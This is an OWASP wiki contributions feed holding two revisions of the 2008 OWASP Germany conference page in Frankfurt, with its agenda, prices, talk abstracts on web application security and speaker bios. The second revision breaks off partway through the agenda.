<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fukami</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Fukami"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Fukami"/>
		<updated>2026-04-26T04:32:42Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=44416</id>
		<title>OWASP Germany 2008 Conference</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=44416"/>
				<updated>2008-10-22T22:31:44Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: /* Sicherheit von Rich Internet Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Die OWASP Germany 2008 Konferenz wird am 25.11.08 mit einer Vorabendveranstalung am 24.11.08 in Frankfurt stattfinden.&lt;br /&gt;
(The OWASP Germany 2008 conference will be held on November 25, 2008 in Frankfurt.)&lt;br /&gt;
&lt;br /&gt;
Veranstaltungsort: Steigenberger Airport Hotel (per Bahn und Flieger gleichermaßen gut zu erreichen)&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;br /&gt;
&lt;br /&gt;
== Agenda ==&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | Dienstag, 25.11.08&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:00-09:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Registrierung und Kaffee&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:30-09:45|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | '''Begrüßung'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 9:45-10:30|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#OWASP Overview (in Englisch) | '''OWASP Overview (in Englisch)''']] &lt;br /&gt;
''Sebastien Deleersnyder, OWASP Foundation Board Member''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen | '''Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen''']]&lt;br /&gt;
''Maximilian Dermann, IT-Security Architect''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-11:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Kaffeepause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:30-12:15|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Kickstart für sichere Webanwendungen |'''Kickstart für sichere Webanwendungen''']]&lt;br /&gt;
''Thomas Schreiber, SecureNet GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:15-13:00|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#SOA Sicherheitsarchitektur | '''SOA Sicherheitsarchitektur''']]&lt;br /&gt;
''Dr. Bruce Sams, OPTIMAbit GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-14:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Mittagspause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:00-14:45|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls | '''Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls''']] &lt;br /&gt;
''Alex Meisel, Art of Defence''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | &amp;amp;nbsp; || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Tracks: 30 Min Präsentation , 10 Min Diskussion + Raumsuche&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | &amp;amp;nbsp; || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=&amp;quot;left&amp;quot; |  '''Track 1''' &lt;br /&gt;
 | style=&amp;quot;width:40%; background:#A0C0E0&amp;quot; align=&amp;quot;left&amp;quot; |  '''Track 2''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:30 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Measuring the Security of Web Applications | '''Measuring the Security of Web Applications''']]&lt;br /&gt;
''Sebastian Schinzel, Virtual Forge''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Server- und Browser-basierte XSS Erkennung | '''Server- und Browser-basierte XSS Erkennung''']]&lt;br /&gt;
''Martin Johns, Uni Passau, und Jeremias Reith, Uni Hamburg''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:30-16:10 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Security-by-Design durch Einsatz von MVC | '''Security-by-Design durch Einsatz von MVC''']] &lt;br /&gt;
''Mirko Richter, SecureNet GmbH''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Cross-Site Scripting Filter Evasion | '''Cross-Site Scripting Filter Evasion''']] &lt;br /&gt;
''Alexios Fakos, n.runs AG''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:10-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Kaffeepause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:10 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Learning of Positive Security Models for Web-Applications | '''Learning of Positive Security Models for Web-Applications''']]&lt;br /&gt;
''Christian Bockermann''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#a0c0e0 &amp;quot; align=left&amp;quot; | [[#Sicherheit von Rich Internet Applications | '''Sicherheit von Rich Internet Applications''']]&lt;br /&gt;
''fukami, SektionEins GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:10-17:50|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software | '''Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software''']]&lt;br /&gt;
''N.N., SAP AG (angefragt), Dr. Boris Hemkemeier, Commerzbank''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:50-18:00|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | '''Schlusswort'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot; ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:#4058A0&amp;quot; | OWASP Germany&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Anmeldung und Preise ==&lt;br /&gt;
&lt;br /&gt;
Anmeldeinformationen in Kürze an dieser Stelle.&lt;br /&gt;
&lt;br /&gt;
'''Preise:'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; &amp;lt;hiddentext&amp;gt;generated with [[:de:Wikipedia:Helferlein/VBA-Macro for EXCEL tableconversion]] V1.7&amp;lt;\hiddentext&amp;gt;&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; width=&amp;quot;112&amp;quot; height=&amp;quot;13&amp;quot; | „normaler“ Teilnehmer&lt;br /&gt;
| width=&amp;quot;60&amp;quot; | 149 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | OWASP-Mitglied&lt;br /&gt;
 | 99 EUR&lt;br /&gt;
&lt;br /&gt;
|-   valign=&amp;quot;bottom&amp;quot;&lt;br /&gt;
|style=&amp;quot;background-color:#99CCFF&amp;quot; height=&amp;quot;13&amp;quot; | Studenten&lt;br /&gt;
 | kostenlos&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Preise zzgl. MwSt.&lt;br /&gt;
&lt;br /&gt;
== Sponsoring ==&lt;br /&gt;
&lt;br /&gt;
Es besteht die Möglichkeit zum Ausstellen und zum Logo-Sponsoring. [http://www.owasp.org/index.php/Image:OWASP_D_2008_Sponsoren_Info.pdf Infos für Sponsoren hier.]&lt;br /&gt;
&lt;br /&gt;
== Abstracts ==&lt;br /&gt;
&lt;br /&gt;
=== OWASP Overview (in Englisch) ===&lt;br /&gt;
An introduction to  Open Web Application Security Project (OWASP), a worldwide free and open community focused on improving the security of application software. Our mission is to make application security &amp;quot;visible,&amp;quot; so that people and organizations can make informed decisions about application security risks.&lt;br /&gt;
&lt;br /&gt;
''Über Sebastien Deleersnyder''&lt;br /&gt;
&lt;br /&gt;
Sebastien started the successful Belgian OWASP Chapter and performed several public presentations on web application and web services security. Sebastien specialises in (web) applicatoin security, combining his software development and information security experience. He is currently OWASP Foundation board member and responsible for the Telindus application security offering in Belgium.&lt;br /&gt;
&lt;br /&gt;
=== Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen ===&lt;br /&gt;
&lt;br /&gt;
''Über Maximilian Dermann''&lt;br /&gt;
&lt;br /&gt;
Maximilian Dermann ist selbstständiger IT-Security Architect. Er war bei Lufthansa Technik für mehr als fünf Jahre für die Sicherheit und den Betrieb der zuletzt über 60 eBusiness Applikationen zuständig. Seine Aufgaben beinhalteten u.a. die Erstellung von Detailrichtlinien für sichere Softwareentwicklung und den sicheren Betrieb der Applikationen, die Koordination von Sicherheitsaudits, das Design und die Koordination des Betriebs der Sicherheitsinfrastruktur sowie die Verantwortung für das Betriebsbudget. Als Projektleiter und Architekt hat er mehrere Projekte im Bereich IT-Sicherheit und IT-Infrastruktur durchgeführt.  Maximilian Dermann war als Berater und Softwareentwickler im Bereich Webapplikationssicherheit an insgesamt vier Online-Banking und -Brokerage Projekten beteiligt. Er ist aktives Mitglied des OWASP German Chapters und einer der Co-Autoren des Best Practices Guide für Web Application Firewalls.&lt;br /&gt;
&lt;br /&gt;
=== Kickstart für sichere Webanwendungen ===&lt;br /&gt;
Der Ansatzpunkte und Maßnahmen zur Absicherung von Webanwendungen gibt es viele - doch wo fange ich an und was ist der für meinen ganz speziellen Fall beste Weg? &lt;br /&gt;
&lt;br /&gt;
Der Vortrag gibt einen kompakten Überblick über die verschiedenen Ansatzpunkte zur Absicherung von Webanwendungen, diskutiert Vor- und Nachteile und stellt Erfahrungen aus der Praxis dar.&lt;br /&gt;
&lt;br /&gt;
''Über Thomas Schreiber''&lt;br /&gt;
&lt;br /&gt;
Thomas Schreiber ist Geschäftsführer der SecureNet GmbH und Berater für die Sicherheit von Webanwendungen. Seit vielen Jahren beschäftigt er sich mit Sicherheitsaspekten von Webanwendungen und hat mittlerweile Hunderte von Webanwendungen auf ihre Sicherheit hin untersucht. Er ist Coautor des vom Bundesamt für Sicherheit in der Informationstechnik (BSI) herausgegebenen &amp;quot;Maßnahmenkatalog und Best Practices für die Sicherheit von Webanwendungen&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
=== SOA Sicherheitsarchitektur ===&lt;br /&gt;
Der Einsatz von SOA erfordert ein neues Sicherheitsmodell, da viele altbewährte Lösungen für Benutzermanagement, Authentifizierung, Autorisierung usw. nicht mehr funktionieren. Auch kommen neue Anforderungen hinzu, wie z.B. die Föderation und die Integration mit PKI-Systemen. Dieser Vortrag zeigt die spezifischen Sicherheitsprobleme von SOA von einer Architekturperspektive. Wichtige Standards für SOA, wie Policy Enforcement Point (PEP), Policy Decision Point (PDP), SAML, XACML, und deren konkrete Benutzung werden besprochen. Die Bedeutung von Rollenmodelle und die flexible Einbindung von solchen in SOAs wird auch behandelt.&lt;br /&gt;
&lt;br /&gt;
''Über Bruce Sams''&lt;br /&gt;
&lt;br /&gt;
Dr. Bruce Sams ist ausgebildeter Physiker und Geschäftsführer von OPTIMAbit GmbH, einer führenden Beratungsfirma im Bereich Anwendungssicherheit (Architecture Review, Penetration Test, Single-Sign-On, PKI und mehr). Dr. Sams ist Autor vieler Fachartikel.&lt;br /&gt;
&lt;br /&gt;
=== OWASP Best Practices zum Einsatz von Web Application Firewalls ===&lt;br /&gt;
Der Vortrag stellt den vom OWASP Germany Chapter erstellten ''OWASP Best Practices zum Einsatz von Web Application Firewalls'' vor.&lt;br /&gt;
&lt;br /&gt;
Das Dokument wendet sich vornehmlich an technische Entscheider - speziell Betriebsverantwortliche, Sicherheitsverantwortliche, Applikationseigner (Fachabteilung, technisch Anwendungsverantwortlicher), die den Einsatz einer WAF im Unternehmen evaluieren. Spezielles Augenmerk wurde – wo immer möglich – auf die Darstellung von Aufwandsabschätzungen gelegt – auch im Vergleich zu möglichen Alternativen wie z. B. Änderungen im Sourcecode.&lt;br /&gt;
&lt;br /&gt;
''Über Alex Meisel''&lt;br /&gt;
&lt;br /&gt;
Bereits in seiner Informatik-Diplomarbeit beschäftigte Alex Meisel sich mit der Abwehr und der Rückverfolgung von sog. Denial-of-Service- Attacken. Bei einem Schweizer IT-Dienstleister war er als Experte für Web-Sicherheit tätig; anschließend betreute er beim größten europäischen Internet-Knotenpunkt LINX (London Internet Exchange) Mitglieder in Fragen der Netzwerk-Sicherheit.&lt;br /&gt;
&lt;br /&gt;
Nach seiner drei-jährigen Tätigkeit als Senior Consultant für Design und Implementierung von großen Web-Farmen inkl. Security-Audits bei einem führenden Hersteller von Web-Servern wechselte er als Leiter Projektmanagement zur Realisierung von Web-Applikations-Lösungen im SAP-Umfeld zum gleichen Fortune-500-Unternehmen.&lt;br /&gt;
&lt;br /&gt;
=== Measuring the Security of Web Applications ===&lt;br /&gt;
Software ist unsicher! &amp;quot;Security Researcher&amp;quot; publizieren nahezu täglich Sicherheitsmängel in Softwareapplikationen in einschlägigen Mailinglisten und Internetforen. Und das bereits seit Jahrzehnten. &lt;br /&gt;
Softwaresicherheit wird immer wichtiger mit der zunehmenden Vernetzung und Kritikalität der Daten. Daher reservieren Softwarehersteller oft signifikante (aber trotzdem begrenzte) Budgets zur sicheren Softwareentwicklung. Um diese Budgets werben Dienstleister und Hersteller von verschiedensten Sicherheitsprodukten. Oft halten diese Dienste und Produkte nicht das, was das Marketing verspricht. &lt;br /&gt;
Für Softwarehersteller stellt sich die Frage in welche Prozesse und Technologien in welchem Umfang investiert werden sollte: &amp;quot;Wieviel Sicherheitszuwachs bekommt man für wieviel Aufwand&amp;quot;? In diesem Vortrag beleuchte ich Wege und Irrwege, um dieses Kosten-Nutzen-Verhältnis abzuschätzen und zu optimieren. &lt;br /&gt;
&lt;br /&gt;
''Über Sebastian Schinzel''&lt;br /&gt;
&lt;br /&gt;
Sebastian Schinzel ist seit mehr als fünf Jahren Entwickler und Sicherheitsberater. Sein Fokus liegt auf Sicherheitsuntersuchungen und sicherer Softwareentwicklung von Geschäftsapplikationen. Bei Virtual Forge führt er Sicherheitsuntersuchungen von SAP-Geschäftsapplikationen durch und berät SAP-Kunden zu sicherer Softwareentwicklung. &lt;br /&gt;
&lt;br /&gt;
=== Security-by-Design durch Einsatz von MVC ===&lt;br /&gt;
::to be completed&lt;br /&gt;
''Über Mirko Richter''&lt;br /&gt;
::to be completed&lt;br /&gt;
&lt;br /&gt;
=== Server- und Browser-basierte XSS Erkennung ===&lt;br /&gt;
Wenn man sich HTTP Verkehr von Web Applikationen unter dem Gesichtspunkt des Erkennens von eingeschleustem JaveScript-codes betrachtet, fallen zwei einfache Zusammenhänge ins Auge:&lt;br /&gt;
&lt;br /&gt;
- Die Menge aller von einer Web Applikation legitim verwendeten JavaScripte ist stark eingeschränkt, was sowohl in Anzahl wie auch in&lt;br /&gt;
Varianten betrifft, und ist somit maschinell erfassbar. &lt;br /&gt;
&lt;br /&gt;
- Es gibt einen klaren Zusammenhang zwischen den Parametern eines eingehenden HTTP Requests und den (eventuellen) reflected XSS Scripten, die in der resultierenden Web Seite enthalten sind.&lt;br /&gt;
&lt;br /&gt;
Basierend auf diesen beiden Beobachtungen wurden an den Universitäten Hamburg und Passau zwei Detektoren entwickelt, die in der Lage sind XSS Angriffe zu erkennen. Der Vortrag wird beide Erkennungsmethoden vorstellen und aufzeigen wie wir diese auf der Server-seite [1] sowie im Browser [2] umgesetzt haben.&lt;br /&gt;
&lt;br /&gt;
Links:&lt;br /&gt;
&lt;br /&gt;
[1] Martin Johns, Bjoern Engelmann, Joachim Posegga: XSSDS:&lt;br /&gt;
Server-side detection of cross-site scripting attacks, in Annual&lt;br /&gt;
Computer Security Applications Conference (ACSAC '08), December 2008,&lt;br /&gt;
http://www.informatik.uni-hamburg.de/SVS/papers/2008_ACSAC_johns_Engelmann_Posegga_XSSDS.pdf&lt;br /&gt;
&lt;br /&gt;
[2] Jeremias Reith, noXSS, Firefox extension, http://www.noxss.org/&lt;br /&gt;
&lt;br /&gt;
''Über Martin Johns und Jeremias Reith''&lt;br /&gt;
&lt;br /&gt;
Martin Johns ist wissenschaftlicher Mitarbeiter an der Universität Passau, wo er im Bereich Web- und Software-Sicherheit forscht und gerade den finalen Schliff an seine Doktorarbeit bringt. Vor seinem Eintritt in die akademische Welt, wirkte er als Software Entwickler in verschiedenen Firmen, wie z.B. Infoseek Deutschland, TC Trustcenter und der SAP AG.&lt;br /&gt;
&lt;br /&gt;
Jeremias Reith studiert seit 2002 Informatik mit dem Schwerpunkt IT Sicherheit an der Universität Hamburg und arbeitet ausserdem als System-Engineer für ein international agierendes Medienhaus. Momentan schreibt er seine Diplomarbeit mit dem Thema &amp;quot;Reliable reflective XSS detection on the client side&amp;quot; und widmet sich in seiner Freizeit der Firefox-Erweiterung noXSS welche vor XSS-Angriffen schützen soll.&lt;br /&gt;
&lt;br /&gt;
=== Cross-Site Scripting Filter Evasion ===&lt;br /&gt;
Die Darstellung seiner Individualität ist einer der Schlüsselfaktoren, um im Web 2.0 Business erfolgreich tätig zu sein. Aus diesem Grund erlauben viele Web 2.0 Anwendungen Ihren Benutzern sich freizügig zu präsentieren. Aber diese Praxis erhöht die Risikoanfälligkeit von Cross-Site Scripting Schwachstellen. Der Vortrag untersucht diverse Blacklist- und Whitelist-Ansätze und wie solche Filterregeln umgangen werden können.&lt;br /&gt;
&lt;br /&gt;
''Über Alexios Fakos''&lt;br /&gt;
&lt;br /&gt;
Alexios Fakos ist nach sieben Jahren in der Softwareentwicklung zum deutschen IT Sicherheitsdienstleister n.runs AG gewechselt.&lt;br /&gt;
Zurzeit ist Herr Fakos als Senior Security Consultant tätig. Seine Schwerpunkte sind unter anderem: Penetrationstests, Quellcodeanalysen und Schulungen für Softwareentwickler und -tester. Neben seiner beruflichen Tätigkeit hat Herr Fakos einen Lehrauftrag mit dem Thema Web Security am Fachbereich Mathematik, Naturwissenschaften und Datenverarbeitung (MND) an der Fachhochschule Giessen-Friedberg.&lt;br /&gt;
&lt;br /&gt;
=== Learning of Positive Security Models for Web-Applications ===&lt;br /&gt;
&lt;br /&gt;
In vielen Bereichen haben maschinelle Lernverfahren bereits einen großen Einfluß genommen. SPAM-Bekämpfung und Anomalie-basierte Intrusion-Detection wären ohne KI-Ansätze wie Text-Klassifizierung, Clustering oder Outlier-Detection nicht möglich. Im Bereich der Web-Sicherheit gibt es dagegen bisher nur sehr wenige wissenschaftliche Arbeiten, maschinelles Lernen zu verwenden. Auf der anderen Seite werben immer mehr Hersteller von Web Application Firewalls mit selbst-lernenden Systemen ohne Details preiszugeben.&lt;br /&gt;
&lt;br /&gt;
Der Vortrag gibt einen Überblick über die (wenigen) wissenschaftlichen Arbeiten zum Thema Web-Sicherheit aus dem Blickwinkel des maschinellen Lernens und stellt ein Projekt vor, das versucht, positive Sicherheitsmodelle für WAF-Systeme aus HTTP-Traffic automatisiert zu erstellen.&lt;br /&gt;
&lt;br /&gt;
''Über Christian Bockermann''&lt;br /&gt;
&lt;br /&gt;
Christian Bockermann ist derzeit wissenschaftlicher Mitarbeiter an der Technischen Universität Dortmund. Nach seiner Diplomarbeit zum Thema &amp;quot;Anomalie-Erkennung in Web-Anwendungen&amp;quot; promoviert er zur Zeit am Lehrstuhl für künstliche Intelligenz im Bereich Web-Sicherheit.&lt;br /&gt;
Neben einigen Projekten zur Web-Sicherheit betreibt er die Seite jwall.org [http://jwall.org], die einen Teil der Tools bereitstellt, die im Rahmen der Forschungsarbeiten bisher entwickelt wurden.&lt;br /&gt;
&lt;br /&gt;
=== Sicherheit von Rich Internet Applications ===&lt;br /&gt;
In dem Vortrag soll es um die besonderen Risiken gehen, die beim Einsatz von gängigen Rich Internet Applications vor allem auf Basis von Flash/AIR und Silverlight im Gegensatz zu klassischen Webanwendungen existieren. Ausserdem werden einige Hinweise gegeben, wie diese Anwendungen auditiert werden können und wo dabei die besonderen Schwierigkeiten liegen.&lt;br /&gt;
&lt;br /&gt;
''Über fukami''&lt;br /&gt;
&lt;br /&gt;
fukami arbeitet als Senior Security Consultant für die [http://sektioneins.de SektionEins GmbH] in Köln und hat Spass am Gerät.&lt;br /&gt;
&lt;br /&gt;
=== Goldene Regeln der IT-Sicherheit bei der Beauftragung und Erstellung von Software ===&lt;br /&gt;
::to be completed&lt;br /&gt;
''Über Boris Hemkemeier''&lt;br /&gt;
::to be completed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;br /&gt;
&lt;br /&gt;
[[Category:Germany]]&lt;/div&gt;</summary>
		<author><name>Fukami</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=44415</id>
		<title>OWASP Germany 2008 Conference</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Germany_2008_Conference&amp;diff=44415"/>
				<updated>2008-10-22T22:23:34Z</updated>
		
		<summary type="html">&lt;p&gt;Fukami: /* Sicherheit von Rich Internet Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Die OWASP Germany 2008 Konferenz wird am 25.11.08 mit einer Vorabendveranstalung am 24.11.08 in Frankfurt stattfinden.&lt;br /&gt;
(The OWASP Germany 2008 conference will be held on November 25, 2008 in Frankfurt.)&lt;br /&gt;
&lt;br /&gt;
Veranstaltungsort: Steigenberger Airport Hotel (per Bahn und Flieger gleichermaßen gut zu erreichen)&lt;br /&gt;
&lt;br /&gt;
Zurück zur [[Germany|OWASP Germany Homepage]].&lt;br /&gt;
&lt;br /&gt;
== Agenda ==&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | Dienstag, 25.11.08&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:00-09:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Registrierung und Kaffee&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:30-09:45|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | '''Begrüßung'''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 9:45-10:30|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#OWASP Overview (in Englisch) | '''OWASP Overview (in Englisch)''']] &lt;br /&gt;
''Sebastien Deleersnyder, OWASP Foundation Board Member''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen | '''Wirtschaftlichkeitsbetrachtungen von IT-Sicherheitsmaßnahmen''']]&lt;br /&gt;
''Maximilian Dermann, IT-Security Architect''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-11:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Kaffeepause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:30-12:15|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Kickstart für sichere Webanwendungen |'''Kickstart für sichere Webanwendungen''']]&lt;br /&gt;
''Thomas Schreiber, SecureNet GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:15-13:00|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#SOA Sicherheitsarchitektur | '''SOA Sicherheitsarchitektur''']]&lt;br /&gt;
''Dr. Bruce Sams, OPTIMAbit GmbH''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-14:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Mittagspause&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:00-14:45|| colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls | '''Vorstellung des OWASP Best Practices Guide zum Einsatz von Web Application Firewalls''']] &lt;br /&gt;
''Alex Meisel, Art of Defence''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | &amp;amp;nbsp; || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;center&amp;quot; | Tracks: 30 Min Präsentation , 10 Min Diskussion + Raumsuche&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | &amp;amp;nbsp; || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=&amp;quot;left&amp;quot; |  '''Track 1''' &lt;br /&gt;
 | style=&amp;quot;width:40%; background:#A0C0E0&amp;quot; align=&amp;quot;left&amp;quot; |  '''Track 2''' &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:30 || style=&amp;quot;width:40%; background:#FFDF80&amp;quot; align=left&amp;quot; | [[#Measuring the Security of Web Applications | '''Measuring the Security of Web Applications''']]&lt;br /&gt;
''Sebastian Schinzel, Virtual Forge''&lt;br /&gt;
